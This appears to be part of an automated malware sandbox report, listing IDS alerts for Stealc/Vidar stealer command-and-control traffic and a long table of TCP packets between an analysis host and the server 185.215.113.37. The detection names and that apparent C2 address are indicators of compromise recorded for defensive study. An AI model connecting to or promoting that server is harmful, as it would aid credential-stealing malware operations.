2024-09-26T18:27:03.748786+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.37	80	192.168.2.4	49730	TCP
2024-09-26T18:27:04.836136+0200	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T18:27:05.356528+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T18:27:11.408010+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T18:27:12.656299+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T18:27:13.399956+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T18:27:14.045792+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T18:27:16.696172+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T18:27:17.351165+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 18:27:02.274373055 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:02.279398918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:02.279517889 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:02.279654980 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:02.284471989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:03.027650118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:03.027805090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:03.042732954 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:03.047591925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:03.282198906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:03.282355070 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:03.296380997 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:03.301320076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:03.517503023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:03.517560959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:03.517704010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:03.519190073 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:03.524080992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:03.741457939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:03.741506100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:03.741543055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:03.741554022 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:03.741579056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:03.741589069 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:03.741589069 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:03.741633892 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:03.741635084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:03.741674900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:03.741684914 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:03.741708040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:03.741719007 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:03.741743088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:03.741756916 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:03.741792917 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:03.743957996 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:03.748785973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:03.965451002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:03.965555906 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:03.987111092 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:03.987133980 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:03.992242098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:03.992279053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:03.992311954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:03.992362976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:03.992405891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:03.992433071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:03.992459059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:04.836004972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:04.836136103 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.137162924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.142088890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.356328011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.356372118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.356405973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.356437922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.356473923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.356528044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.356528044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.356618881 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.356739998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.356803894 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.356909037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.356940985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.356961012 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.356987000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.356995106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.357028961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.357044935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.357064009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.357074976 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.357116938 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.358674049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.358738899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.481331110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.481364012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.481460094 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.481461048 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.481898069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.481931925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.481965065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.481970072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.481993914 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.482001066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.482012987 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.482037067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.482053041 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.482090950 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.482323885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.482384920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.482489109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.482522011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.482553959 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.482556105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.482573986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.482589960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.482610941 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.482642889 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.484131098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.484164000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.484195948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.484208107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.484208107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.484246016 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.484718084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.484750986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.484783888 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.484801054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.484805107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.484833002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.484853983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.484865904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.484920979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.484926939 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.484955072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.484968901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.484968901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.484992027 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.485017061 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.485047102 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.608594894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.608639956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.608696938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.608733892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.608762026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.608849049 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.608850002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.608850002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.608923912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.608978033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.609102011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.609134912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.609153032 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.609174967 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.609256983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.609303951 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.609462976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.609494925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.609513044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.609529972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.609550953 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.609563112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.609579086 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.609606028 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.610323906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.610356092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.610378981 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.610390902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.610404968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.610436916 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.610486031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.610519886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.610532999 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.610562086 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.611025095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.611076117 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.611175060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.611207962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.611223936 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.611252069 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.611347914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.611381054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.611401081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.611434937 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.612078905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.612111092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.612132072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.612145901 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.612153053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.612189054 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.612236977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.612270117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.612283945 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.612319946 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.612859011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.612909079 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.613168001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.613199949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.613220930 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.613234043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.613243103 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.613267899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.613277912 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.613312006 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.613827944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.613879919 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.614020109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.614052057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.614064932 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.614084005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.614098072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.614119053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.614128113 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.614166975 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.614803076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.614851952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.614861012 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.614886045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.614900112 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.614918947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.614931107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.614953041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.614968061 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.615003109 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.615906000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.615962982 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.616000891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.616034031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.616045952 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.616075039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.616142035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.616189003 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.731473923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.731509924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.731544971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.731604099 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.731631994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.731642962 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.731668949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.731703043 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.731714010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.731724977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.731760979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.731774092 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.731813908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.731887102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.731945038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.732036114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.732069969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.732083082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.732134104 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.732353926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.732403994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.732419968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.732439995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.732466936 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.732475996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.732492924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.732508898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.732517004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.732542992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.732584000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.732614994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.732620955 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.732644081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.732644081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.732650042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.732681990 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.732686043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.732726097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.732745886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.732764006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.732795954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.732830048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.732836008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.732856989 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.732881069 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.733136892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.733170033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.733201981 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.733203888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.733223915 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.733233929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.733256102 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.733293056 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.733308077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.733340025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.733367920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.733372927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.733387947 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.733407021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.733427048 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.733439922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.733472109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.733489990 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.733506918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.733510971 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.733536959 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.733575106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.733613968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.733645916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.733678102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.733710051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.733741999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.733767986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.733792067 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.733948946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.733980894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.734015942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.734091043 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.734117031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.734148026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.734179974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.734211922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.734244108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.734276056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.734291077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.734308004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.734313011 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.734332085 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.734339952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.734374046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.734375000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.734396935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.734406948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.734452009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.734457970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.734472990 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.734491110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.734524012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.734572887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.734576941 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.734596968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.734606981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.734632969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.734642982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.734674931 CEST	80	49730	185.215.113.37	192.168.2.4
